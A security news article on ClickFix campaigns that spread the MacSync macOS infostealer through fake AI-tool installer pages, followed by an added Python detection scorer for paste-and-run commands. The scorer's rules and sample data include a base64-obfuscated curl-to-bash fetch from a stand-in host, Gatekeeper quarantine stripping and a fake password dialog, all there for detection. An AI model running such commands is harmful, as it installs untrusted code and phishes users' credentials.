ClickFix Campaigns Spread MacSync on macOS

Researchers found three ClickFix campaigns pushing a macOS infostealer called MacSync via fake AI and developer tool installers. Rather than exploiting a software flaw, the attacks rely on users copying and running malicious Terminal commands from convincing setup pages hosted on legitimate platforms such as Cloudflare Pages, Squarespace, and Tencent EdgeOne. The lures have been spread through malicious search ads and have targeted people looking for tools like Claude Code. The campaign underlines a familiar truth: if attackers can persuade users to do the dangerous bit themselves, life gets much easier for them.

Fake AI installers, real macOS trouble

Mac users have long enjoyed telling Windows users that “we don’t really get malware”. Cybercriminals, naturally, took that as a challenge.
Researchers have identified three separate ClickFix campaigns distributing a macOS infostealer known as MacSync. The trick is irritatingly simple: instead of exploiting a technical flaw, the attackers persuade users to copy and paste dodgy Terminal commands while trying to install what appears to be a legitimate AI or developer tool. It is less “sophisticated cyber exploit” and more “please sabotage your own Mac for us”.

How the scam works

Victims are lured through malicious search adverts to convincing pages hosted on otherwise reputable services, including Cloudflare Pages, Squarespace and Tencent EdgeOne. These pages present fake installation instructions for tools such as Claude Code, encouraging the user to run obfuscated commands in Terminal. Once executed, those commands install the MacSync malware, which is designed to steal information from the compromised device.

Why it matters

This style of attack is particularly effective because it avoids the usual exploit chain. There is no noisy browser crash, no flashy zero-day, just a user doing exactly what the page tells them. Because the commands run from Terminal, whatever they fetch with curl never carries the quarantine attribute that Gatekeeper checks on browser downloads, so the familiar "unidentified developer" warning never appears. That makes the campaign harder to stop with traditional vulnerability-based thinking and highlights the growing overlap between social engineering, developer tooling and AI-themed lures.

What organisations should do

Security teams should train staff never to run unknown Terminal commands copied from websites, even if the page looks polished and the tool sounds trendy. Blocking malicious ads, monitoring shell activity and controlling who can install software on macOS endpoints would all help. On the monitoring side, the shapes worth watching are shells spawned from Terminal that pipe curl or wget straight into bash or sh, or decode a base64 blob into a shell. The caveat is that plenty of legitimate developer installers (Homebrew and rustup, for instance) use exactly the same curl-into-shell pattern, so shape alone is noisy: pair it with an allowlist of the installer hosts your estate actually expects. In short: if a website tells you to paste mystery commands into Terminal, assume the website is not your friend.
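A worked illustration of that monitoring idea, added here as an example and not code from the article, from the researchers it cites, or from any vendor: a small scorer that flags paste-and-run command shapes, decodes one layer of base64 obfuscation to look for the fetch hidden inside, and demotes the same shape when it points at an allowlisted installer host. The rule patterns, the allowlist hosts, the `installer.example.invalid` URL and the sample command lines are all assumptions constructed for illustration; none of them are MacSync's actual commands.

```python
"""Heuristic scoring for ClickFix-style "paste this into Terminal" commands.

Added example for this article, not code from the article, from the
researchers it cites, or from any vendor. The rule shapes, the host
allowlist and the sample commands are assumptions constructed for
illustration; they are not MacSync's actual commands.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

# (name, regex, weight). Shapes are assumptions about how paste-and-run
# installers usually look, not a signature for any one campaign.
RULES = [
    # curl ... | bash   /   wget ... | sudo sh
    ("remote_fetch_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"), 4),
    # bash -c "$(curl ...)"  (the shape Homebrew's official installer uses)
    ("command_substitution_fetch", re.compile(r"\$\(\s*(curl|wget)\b"), 4),
    # echo <blob> | base64 -d | sh : decoding a blob straight into a shell
    ("base64_decode_to_shell",
     re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"), 5),
    # xattr -c / xattr -d ... : clearing or deleting attributes, which is how
    # the com.apple.quarantine flag Gatekeeper relies on gets stripped
    ("quarantine_removal",
     re.compile(r"\bxattr\s+-[A-Za-z]*[cd][A-Za-z]*(\s+com\.apple\.quarantine)?"), 4),
    # inline AppleScript, commonly used to pop a password dialog
    ("osascript_inline", re.compile(r"\bosascript\s+-e\b"), 2),
]
FETCH_RULES = {"remote_fetch_piped_to_shell", "command_substitution_fetch"}
HOST_RE = re.compile(r"""https?://([^/\s"'|)]+)""")
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Assumed, organisation-maintained allowlist of hosts whose official
# installers legitimately use the curl | sh shape. Tune for your estate.
DEFAULT_ALLOWED_HOSTS = frozenset({"raw.githubusercontent.com", "sh.rustup.rs"})
THRESHOLD = 5


@dataclass
class Finding:
    command: str
    score: int
    rules: list = field(default_factory=list)
    hosts: list = field(default_factory=list)


def _decode_blobs(cmd):
    """Yield printable decodings of base64-looking tokens (one level only)."""
    for tok in B64_RE.findall(cmd):
        if len(tok) % 4:
            continue
        try:
            text = base64.b64decode(tok, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            yield text


def score_command(cmd, allowed_hosts=DEFAULT_ALLOWED_HOSTS, _depth=0):
    """Score one command line; higher means more ClickFix-like."""
    matched = [name for name, rx, _ in RULES if rx.search(cmd)]
    score = sum(w for name, _, w in RULES if name in matched)
    hosts = sorted({h.lower() for h in HOST_RE.findall(cmd)})
    unknown = [h for h in hosts if h not in allowed_hosts]
    if matched and unknown:
        score += 3
        matched.append("host_not_allowlisted")
    elif matched and hosts and set(matched) <= FETCH_RULES:
        # Same shape as a trusted installer from an allowlisted host: demote.
        score = max(score - 4, 0)
        matched.append("allowlisted_installer")
    if _depth == 0:
        # Obfuscated one-liners hide the real fetch inside a base64 blob;
        # decode one level and score the inner command as well.
        for text in _decode_blobs(cmd):
            inner = score_command(text, allowed_hosts, _depth=1)
            score += inner.score
            matched.extend("decoded:" + r for r in inner.rules)
            hosts.extend(h for h in inner.hosts if h not in hosts)
    return Finding(cmd, score, matched, hosts)


def scan(commands, allowed_hosts=DEFAULT_ALLOWED_HOSTS, threshold=THRESHOLD):
    """Return findings at or above threshold, highest score first."""
    findings = [score_command(c, allowed_hosts) for c in commands]
    return sorted((f for f in findings if f.score >= threshold),
                  key=lambda f: -f.score)


# Constructed sample: command lines as an endpoint agent might report them.
_HIDDEN = "curl -fsSL http://installer.example.invalid/setup.sh | bash"
SAMPLE_COMMANDS = [
    '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    "curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh",
    "git clone https://github.com/example/repo.git && cd repo && npm install",
    f"echo {base64.b64encode(_HIDDEN.encode()).decode()} | base64 -d | bash",
    "xattr -rd com.apple.quarantine /tmp/Installer.app && osascript -e "
    "'display dialog \"Enter your password to finish setup\" default answer \"\" with hidden answer'",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_COMMANDS):
        print(f"[{f.score:2d}] {', '.join(f.rules)}")
        print(f"     hosts={f.hosts or '-'}  cmd={f.command[:90]}")
```

Run as a script it reports only the two constructed ClickFix-style lines: the base64 one scores highest because the decoded payload contributes its own fetch-into-shell rule plus an unknown host, while the Homebrew and rustup installers drop to zero because their hosts are on the allowlist. The point of the allowlist branch is the caveat above: the curl-into-shell shape is identical for legitimate and malicious installers, so the host is what separates them, and in production the allowlist should be the list of installer sources your organisation has actually approved.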